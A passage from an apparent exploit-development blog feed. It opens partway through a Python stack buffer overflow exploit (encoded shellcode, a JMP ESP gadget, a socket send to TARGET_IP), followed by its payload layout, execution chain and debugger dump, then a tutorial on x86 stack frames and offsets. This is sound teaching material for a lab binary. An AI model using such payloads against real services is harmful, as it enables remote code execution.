</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\xa0\x4c\x36\x4a\x12\x3a\xc9\x9a\x6b\xc3\x66\xe3</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x44\x36\x76\x23\x62\xa9\x0d\x5d\x91\x54\x16\x9a</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\xe8\x82\x93\x39\x4a\x40\x03\xe6\x6b\x85\xd2\x6d</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x67\x62\x90\x2a\x6b\x75\x75\x41\x97\xfe\x78\x86</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x1e\x44\x5f\x02\x7b\x1e\xfe\x13\x21\xf1\xff\x44</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x8a\xae\xa5\x0f\x26\xba\xd7\x4d\x2c\x3d\x65\xe8</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x02\x3d\x75\xf3\x32\x56\x44\x78\xdd\x21\x59\xab</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x9a\xe3\xc2\xcb\xb4\x93\xac\x61\xf9\xf9\x4e\x5c</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x3d\x04\xcd\x55\xbd\xf3\xcd\x1f\xb8\xb8\x49\xf3</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\xb0\xd1\x3f\xf3\x67\xd1\x15\x90\xe6\x41\xf5\x79</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x8d\xe1\x9c\x85</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">sub_esp</span> <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x83\xec\x10</span><span class="s2">&#34;</span>           <span class="c1"># sub esp, 0x10</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">payload</span>  <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;A&#34;</span> <span class="o">*</span> <span class="mi">68</span>                <span class="c1"># fill buf[64] + overwrite saved EBP</span>
</span></span><span class="line"><span class="cl">    <span class="n">payload</span> <span class="o">+=</span> <span class="n">jmp_esp</span>                  <span class="c1"># overwrite return address with JMP ESP gadget</span>
</span></span><span class="line"><span class="cl">    <span class="n">payload</span> <span class="o">+=</span> <span class="n">sub_esp</span>                  <span class="c1"># move ESP away before decoder runs</span>
</span></span><span class="line"><span class="cl">    <span class="n">payload</span> <span class="o">+=</span> <span class="n">buf</span>                      <span class="c1"># shikata_ga_nai encoded shellcode</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[*] Payload    : </span><span class="si">{</span><span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span><span class="si">}</span><span class="s2"> bytes&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[*] Layout     : [A x68] [JMP ESP] [sub esp,10] [shellcode x</span><span class="si">{</span><span class="nb">len</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span><span class="si">}</span><span class="s2">]&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">try</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">s</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="n">TARGET_IP</span><span class="p">,</span> <span class="n">TARGET_PORT</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">        <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[+] Connected&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">s</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[+] Payload sent&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">s</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">        <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[+] Done. Check target for calc.exe&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">except</span> <span class="ne">ConnectionRefusedError</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[-] Connection refused. Is the service running?&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[-] Error: </span><span class="si">{</span><span class="n">e</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">    <span class="n">exploit</span><span class="p">()</span>
</span></span></code></pre></div><hr>
<h2 id="payload-layout">Payload Layout</h2>
<pre tabindex="0"><code>Offset 0-67   :  A x 68         fills buf[64], overwrites saved EBP
Offset 68-71  :  fd 99 d0 75    JMP ESP address in little-endian
Offset 72-74  :  83 ec 10       sub esp, 0x10 (3 bytes)
Offset 75+    :  shellcode       220 bytes, shikata_ga_nai encoded
Total         :  295 bytes
</code></pre><hr>
<h2 id="execution-chain">Execution Chain</h2>
<p>Here is exactly what happens from the moment the payload lands:</p>
<ol>
<li>The service receives 295 bytes into <code>input</code> via <code>recv()</code>.</li>
<li><code>vulnerable(input)</code> gets called. The prologue sets up the stack frame.</li>
<li><code>strcpy(buf, input)</code> copies the payload into <code>buf</code>. It fills 64 bytes into the buffer, overwrites saved EBP with <code>0x41414141</code>, and overwrites the return address with <code>0x75d099fd</code>.</li>
<li><code>printf</code> runs and prints the garbled output. No crash yet because only stack data was corrupted, not any executing code.</li>
<li>The epilogue runs. <code>mov esp, ebp</code> collapses the local frame. <code>pop ebp</code> loads <code>0x41414141</code> into EBP. <code>ret</code> pops <code>0x75d099fd</code> into EIP.</li>
<li>The CPU jumps to <code>0x75d099fd</code> inside <code>msvcrt.dll</code>. The instruction at that address is <code>JMP ESP</code>.</li>
<li><code>JMP ESP</code> jumps to whatever ESP currently holds. ESP is pointing at offset 72, which is <code>\x83\xec\x10</code>.</li>
<li><code>sub esp, 0x10</code> executes. ESP moves 16 bytes downward, away from the shellcode.</li>
<li>The shikata_ga_nai decoder stub runs. Its scratch writes relative to ESP land 16 bytes below the shellcode. No corruption.</li>
<li>The decoder finishes unpacking and jumps into the decoded shellcode.</li>
<li>The shellcode resolves Windows API addresses and calls <code>WinExec(&quot;calc.exe&quot;, 0)</code>.</li>
<li><code>calc.exe</code> opens on the target.</li>
</ol>
<hr>
<h2 id="windbg-stack-dump-at-execution">WinDbg Stack Dump at Execution</h2>
<p>Stack contents captured right as the shellcode was executing, showing the <code>sub esp</code> prefix at <code>011ff636</code> and the fully decoded shellcode in memory including <code>calc.exe</code> in ASCII at <code>011ff714</code>:</p>
<pre tabindex="0"><code>011ff634  00 00 00 00 00 00 ff ff-83 ec 10 d9 ec ba 67 d7
011ff644  2f 5e d9 74 24 f4 5f 29-c9 b1 31 31 57 18 83 c7
011ff654  04 03 57 14 e2 f5 fc e8-82 00 00 00 60 89 e5 31
011ff664  c0 64 8b 50 30 8b 52 0c-8b 52 14 8b 72 28 0f b7
011ff674  4a 26 31 ff ac 3c 61 7c-02 2c 20 c1 cf 0d 01 c7
011ff714  6c 63 2e 65 78 65 00 01-00 0c bb 21 02 c0 b7 5d
</code></pre><hr>
<h2 id="key-takeaways">Key Takeaways</h2>
<p><code>ret</code> is just <code>pop eip</code>. Control what sits at ESP when <code>ret</code> executes and you control the CPU. That one primitive is what every stack overflow is built on.</p>
<p>Knowing the stack layout cold matters more than any tool. Offset to EIP, what sits between the buffer and the return address, which direction the overflow travels. These need to be automatic before touching an exploit.</p>
<p>Every byte in the payload has a job. Filler, gadget address, decoder protection, shellcode. One wrong byte causes a crash with no obvious indication of where it went wrong. Build and verify each piece separately before assembling the full payload.</p>
<p>Bad character enumeration is not optional. A single corrupted byte mid-shellcode produces a failure that looks identical to any other crash. Do the enumeration before generating shellcode, every time.</p>
<p>The debugger tells the truth. <code>dd esp</code>, <code>db esp</code>, <code>r eip</code>, <code>u eip</code>. When something crashes, the answer is in the register dump and the stack contents. Not in the source code, not in intuition.</p>
<hr>
<p><em>This exploit runs against a deliberately vulnerable lab binary compiled without modern mitigations. It is a learning exercise.</em></p>
]]></content:encoded></item><item><title>Stack Frames - The Foundation of Every Stack Overflow</title><link>https://4w4647.github.io/posts/stack-frames-the-foundation-of-every-stack-overflow/</link><pubDate>Thu, 30 Apr 2026 04:06:54 +0545</pubDate><guid>https://4w4647.github.io/posts/stack-frames-the-foundation-of-every-stack-overflow/</guid><description>A deep dive into x86 stack frames, prologues, epilogues, calling conventions, little-endian memory, and how a simple buffer overflow leads to EIP control.</description><content:encoded><![CDATA[<h2 id="where-everything-starts">Where Everything Starts</h2>
<p>Before you write a single byte of shellcode, before you talk about ROP chains or DEP bypasses, there is one mental model you need to have locked in cold. The stack frame.</p>
<p>Every stack-based exploit ever written comes down to the same thing: you overflow a buffer, you overwrite a return address, and when the function returns, the CPU jumps somewhere you control. That&rsquo;s it. The techniques that come later are just clever ways of working around defenses layered on top of that same primitive.</p>
<p>So let&rsquo;s build the model from scratch, at the instruction level, with no hand-waving.</p>
<hr>
<h2 id="the-x86-stack">The x86 Stack</h2>
<p>The stack is a region of memory that grows <strong>downward</strong>. Higher addresses are at the top conceptually, but as you push things onto the stack, the stack pointer moves toward lower addresses.</p>
<p>Two registers manage it:</p>
<ul>
<li><strong>ESP</strong> (Stack Pointer) always points to the top of the stack, which is the lowest address currently in use</li>
<li><strong>EBP</strong> (Base Pointer) anchors the current function&rsquo;s frame so locals and arguments can be accessed at fixed offsets
Every <code>push</code> subtracts 4 from ESP and writes a value there. Every <code>pop</code> reads from ESP and adds 4. That is the whole mechanism.</li>
</ul>
<hr>
<h2 id="before-the-function-the-callers-job">Before the Function: The Caller&rsquo;s Job</h2>
<p>Take this C code:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">foo</span><span class="p">(</span><span class="kt">int</span> <span class="n">a</span><span class="p">,</span> <span class="kt">int</span> <span class="n">b</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">    <span class="kt">int</span> <span class="n">x</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"> 
</span></span><span class="line"><span class="cl"><span class="nf">foo</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
</span></span></code></pre></div><p>Before <code>foo</code> starts executing, the <strong>caller</strong> has to get the arguments onto the stack. In the <strong>cdecl calling convention</strong> (the default for most x86 C code), arguments are pushed right to left. Last argument first, first argument last.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nf">push</span> <span class="mi">2</span>          <span class="c1">; push b first (last argument)</span>
</span></span><span class="line"><span class="cl"><span class="nf">push</span> <span class="mi">1</span>          <span class="c1">; push a second (first argument)</span>
</span></span><span class="line"><span class="cl"><span class="nf">call</span> <span class="nv">foo</span>        <span class="c1">; now jump into foo</span>
</span></span></code></pre></div><p>Why right to left? Because after the push sequence, the first argument ends up closest to the top of the stack. Once the frame is set up, <code>a</code> will be at <code>[ebp+8]</code> and <code>b</code> will be at <code>[ebp+12]</code>, consistently, regardless of how many arguments there are. This is why <code>printf</code> can take a variable number of arguments and still find the first one reliably.</p>
<p><strong>What does CALL actually do?</strong></p>
<p><code>CALL</code> is not magic. It is equivalent to two instructions:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nf">push</span> <span class="nv">eip</span>        <span class="c1">; push the address of the instruction after CALL</span>
</span></span><span class="line"><span class="cl"><span class="nf">jmp</span> <span class="nv">foo</span>         <span class="c1">; jump to foo</span>
</span></span></code></pre></div><p>The address it pushes is called the <strong>return address</strong>. It is where execution will resume after <code>foo</code> finishes. Without it, the program would have no idea where to go back to.</p>
<p>At this point, just before <code>foo</code> starts, the stack looks like this:</p>
<pre tabindex="0"><code>High Address
┌─────────────────┐
│        2        │  argument b
├─────────────────┤
│        1        │  argument a
├─────────────────┤
│  return address │  pushed by CALL, ESP points here
└─────────────────┘
Low Address
</code></pre><hr>
<h2 id="inside-the-function-the-prologue">Inside the Function: The Prologue</h2>
<p>The moment execution lands inside <code>foo</code>, the first three instructions you will almost always see are the <strong>prologue</strong>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nf">push</span> <span class="nb">ebp</span>        <span class="c1">; save the caller&#39;s base pointer onto the stack</span>
</span></span><span class="line"><span class="cl"><span class="nf">mov</span> <span class="nb">ebp</span><span class="p">,</span> <span class="nb">esp</span>    <span class="c1">; point EBP at the current top of stack</span>
</span></span><span class="line"><span class="cl"><span class="nf">sub</span> <span class="nb">esp</span><span class="p">,</span> <span class="mi">20</span>     <span class="c1">; carve out 20 bytes for local variables</span>
</span></span></code></pre></div><p>Walk through each one:</p>
<p><strong><code>push ebp</code></strong> saves the caller&rsquo;s EBP so it can be restored later. Every function does this so the chain of stack frames stays intact.</p>
<p><strong><code>mov ebp, esp</code></strong> sets EBP to the current value of ESP. From this point forward, EBP is fixed for the duration of the function. It does not move. This gives you a stable anchor to reference locals and arguments by offset.</p>
<p><strong><code>sub esp, 20</code></strong> moves ESP down by 20 bytes, reserving space for <code>buf[16]</code> and <code>int x</code> (4 bytes). The compiler calculates the total size of all locals at compile time and emits a single <code>sub esp</code> to reserve all of it at once. You will never see one <code>sub</code> per variable.</p>
<p>After the prologue, the stack looks like this:</p>
<pre tabindex="0"><code>High Address
┌─────────────────┐
│        2        │  [ebp+12]  argument b
├─────────────────┤
│        1        │  [ebp+8]   argument a
├─────────────────┤
│  return address │  [ebp+4]
├─────────────────┤
│   saved EBP     │  [ebp]     EBP points here
├─────────────────┤
│    buf[16]      │  [ebp-4] to [ebp-20]
├─────────────────┤
│      int x      │  [ebp-24]  ESP points here
└─────────────────┘
Low Address
</code></pre><p>Notice a few things:</p>
<p>Arguments live <strong>above</strong> EBP at positive offsets. Locals live <strong>below</strong> EBP at negative offsets. This is why you will constantly see things like <code>[ebp+8]</code> for the first argument and <code>[ebp-4]</code> for the first local in disassembly. That is not a coincidence. It is the direct result of the prologue.</p>
<p>Also notice that locals declared <strong>first</strong> end up at higher addresses (closer to saved EBP). Locals declared later end up at lower addresses. The stack grows downward, so as space gets reserved, it goes down. This ordering matters when you calculate overflow offsets.</p>
<hr>
<h2 id="leaving-the-function-the-epilogue">Leaving the Function: The Epilogue</h2>
<p>When <code>foo</code> is done, it needs to tear down the frame and return. This is the <strong>epilogue</strong>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nf">mov</span> <span class="nb">esp</span><span class="p">,</span> <span class="nb">ebp</span>    <span class="c1">; point ESP back at saved EBP, discarding all locals</span>
</span></span><span class="line"><span class="cl"><span class="nf">pop</span> <span class="nb">ebp</span>         <span class="c1">; restore caller&#39;s EBP, ESP now points at return address</span>
</span></span><span class="line"><span class="cl"><span class="nf">ret</span>             <span class="c1">; pop return address into EIP, jump there</span>
</span></span></code></pre></div><p>Walk through each one:</p>
<p><strong><code>mov esp, ebp</code></strong> collapses the local variable space in one shot. ESP jumps back up to where EBP is pointing, which is saved EBP. All the locals are now gone as far as the stack is concerned.</p>
<p><strong><code>pop ebp</code></strong> reads the saved EBP value off the stack into the EBP register, restoring the caller&rsquo;s frame. ESP moves up by 4, now pointing at the return address.</p>
<p><strong><code>ret</code></strong> is the most important instruction in exploit development. It is equivalent to:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nf">pop</span> <span class="nv">eip</span>         <span class="c1">; read whatever ESP points to, put it in EIP, add 4 to ESP</span>
</span></span></code></pre></div><p>The CPU takes the return address off the stack and jumps there. Execution resumes in the caller right after the original <code>call foo</code>.</p>
<p>After <code>ret</code>, the stack is back to what it looked like before the call.</p>
<hr>
<h2 id="a-note-on-pointer-arguments">A Note on Pointer Arguments</h2>
<p>One thing that catches beginners out. When a function takes a pointer argument like <code>char *str</code>, the caller does not push the string onto the stack. It pushes a <strong>4-byte address</strong> pointing to where the string lives in memory.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">bar</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">name</span><span class="p">,</span> <span class="kt">int</span> <span class="n">age</span><span class="p">)</span> <span class="p">{</span> <span class="p">...</span> <span class="p">}</span>
</span></span><span class="line"><span class="cl"> 
</span></span><span class="line"><span class="cl"><span class="nf">bar</span><span class="p">(</span><span class="s">&#34;alice&#34;</span><span class="p">,</span> <span class="mi">25</span><span class="p">);</span>
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nf">push</span> <span class="mi">25</span>                  <span class="c1">; int age (4 bytes)</span>
</span></span><span class="line"><span class="cl"><span class="nf">push</span> <span class="o">&lt;</span><span class="nv">addr</span> <span class="nv">of</span> <span class="s">&#34;alice&#34;</span><span class="o">&gt;</span>   <span class="c1">; char* name (4-byte pointer, not the string itself)</span>
</span></span><span class="line"><span class="cl"><span class="nf">call</span> <span class="nv">bar</span>
</span></span></code></pre></div><p>The string <code>&quot;alice&quot;</code> itself sits somewhere in the data segment. What goes on the stack is a pointer to it. Always 4 bytes on x86, regardless of how long the string is.</p>
<hr>
<h2 id="little-endian-memory">Little-Endian Memory</h2>
<p>One more thing you need burned in before you write any exploit code.</p>
<p>x86 is <strong>little-endian</strong>. Multi-byte values are stored in memory with the least significant byte at the lowest address.</p>
<p>So the address <code>0x42658ade</code> in memory looks like:</p>
<pre tabindex="0"><code>Address:  0x00   0x01   0x02   0x03
Value:    de     8a     65     42
</code></pre><p>When you build a Python payload and need to put an address in your buffer, you have to account for this:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">struct</span>
</span></span><span class="line"><span class="cl"><span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&#34;&lt;I&#34;</span><span class="p">,</span> <span class="mh">0x42658ade</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="c1"># produces: b&#39;\xde\x8a\x65\x42&#39;</span>
</span></span></code></pre></div><p>The <code>&lt;I</code> means little-endian unsigned 32-bit integer. Get this backwards and your exploit crashes every time at <code>ret</code> because EIP gets loaded with the wrong address. This is one of the most common reasons a first exploit attempt fails.</p>
<hr>
<h2 id="the-exploit-primitive">The Exploit Primitive</h2>
<p>Here is where it all connects.</p>
<p><code>buf[16]</code> lives near the bottom of the stack frame. If a function copies user-controlled data into <code>buf</code> without checking the length, that data writes upward in memory. It fills the buffer first, then keeps going.</p>
<p>Starting from the first byte of <code>buf</code>:</p>
<pre tabindex="0"><code>Bytes 1-16    fill buf[16]
Bytes 17-20   overwrite saved EBP
Bytes 21-24   overwrite the return address
</code></pre><p><strong>Offset to EIP = 20 bytes</strong></p>
<p>When the function returns and <code>ret</code> executes, it pops whatever is at ESP into EIP. You put your own address at offset 21. The CPU jumps there. You own execution.</p>
<p>That is the primitive. That is what every stack overflow in this course is built on.</p>
<hr>
<h2 id="calculating-the-offset-the-formula">Calculating the Offset: The Formula</h2>
<pre tabindex="0"><code>offset to EIP = size of buf
              + size of locals at HIGHER addresses than buf
              + 4 bytes for saved EBP
</code></pre><p>The tricky part is the second term. Locals at higher addresses than <code>buf</code> sit between <code>buf</code> and <code>saved EBP</code>. You have to overflow through them to reach <code>saved EBP</code> and then the return address.</p>
<p>Locals at <strong>lower</strong> addresses than <code>buf</code> are irrelevant. The overflow travels upward, away from them.</p>
<p>Example:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">vuln</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">input</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">    <span class="kt">int</span> <span class="n">check</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>Stack after prologue:</p>
<pre tabindex="0"><code>High Address
┌─────────────────┐
│      len        │  argument
├─────────────────┤
│   input ptr     │  argument (4-byte pointer)
├─────────────────┤
│  return address │  [ebp+4]
├─────────────────┤
│   saved EBP     │  [ebp]
├─────────────────┤
│    buf[64]      │
├─────────────────┤
│     check       │  ESP points here
└─────────────────┘
Low Address
</code></pre><p><code>check</code> is below <code>buf</code>. Overflow never touches it. <code>saved EBP</code> is directly above <code>buf</code>.</p>
<p>Offset to EIP = 64 + 4 = <strong>68 bytes</strong>.</p>
<hr>
<h2 id="windbg-reading-the-stack-live">WinDbg: Reading the Stack Live</h2>
<p>Once you are in a debugger staring at a crash, these are the commands you run immediately:</p>
<pre tabindex="0"><code>dd ebp      read saved EBP (tells you if the frame is corrupted)
dd ebp+4    read the return address (tells you what EIP will become)
dd esp      read the top of the stack
k           show the full call stack
r           dump all registers
</code></pre><p>If you see a pattern like <code>41414141</code> at <code>[ebp+4]</code>, that means you&rsquo;ve overwritten the return address with <code>AAAA</code> and you now know your overflow is reaching EIP. From there it is a matter of finding the exact offset and replacing those bytes with something useful.</p>
<hr>
<h2 id="quick-reference">Quick Reference</h2>
<table>
  <thead>
      <tr>
          <th>Instruction</th>
          <th>What It Does</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td><code>push ebp</code></td>
          <td>Save caller&rsquo;s frame pointer onto the stack</td>
      </tr>
      <tr>
          <td><code>mov ebp, esp</code></td>
          <td>Anchor EBP to current stack top</td>
      </tr>
      <tr>
          <td><code>sub esp, N</code></td>
          <td>Reserve N bytes for local variables</td>
      </tr>
      <tr>
          <td><code>mov esp, ebp</code></td>
          <td>Collapse locals, ESP jumps back to saved EBP</td>
      </tr>
      <tr>
          <td><code>pop ebp</code></td>
          <td>Restore caller&rsquo;s EBP, ESP moves to return address</td>
      </tr>
      <tr>
          <td><code>ret</code></td>
          <td>Pop return address into EIP, jump there</td>
      </tr>
  </tbody>
</table>
<hr>
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>The stack grows downward. Push moves ESP toward lower addresses.</li>
<li>Arguments are pushed right to left by the caller before <code>CALL</code>.</li>
<li><code>CALL</code> = push return address + jump to function.</li>
<li>The prologue sets up the frame in three instructions. The epilogue tears it down in three instructions.</li>
<li>EBP is fixed for the life of the function. Arguments are at positive offsets from EBP. Locals are at negative offsets.</li>
<li><code>ret</code> = pop EIP. If you control what is at ESP when <code>ret</code> executes, you control where the CPU goes next.</li>
<li>Overflow travels upward in memory. Locals below the buffer are never reached.</li>
<li>x86 is little-endian. Addresses in payloads must be packed bytes-reversed.</li>
<li>Offset to EIP = size of buf + locals above buf + 4 (saved EBP).</li>
</ul>
]]></content:encoded></item></channel></rss>